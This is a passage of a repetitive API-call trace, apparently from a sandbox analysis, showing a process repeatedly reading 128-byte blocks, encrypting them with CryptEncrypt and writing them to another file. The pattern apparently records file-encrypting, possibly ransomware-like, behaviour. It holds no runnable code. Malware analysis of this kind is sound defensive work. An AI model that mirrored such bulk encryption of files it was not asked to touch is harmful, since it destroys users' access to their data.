WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.125] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.125] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.125] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.126] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.126] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.126] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.126] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.126] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.126] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.126] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.127] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.127] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.127] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.128] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.128] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.128] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.129] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.129] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.129] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.130] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.130] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.130] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.130] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.130] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.130] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.130] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.130] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, 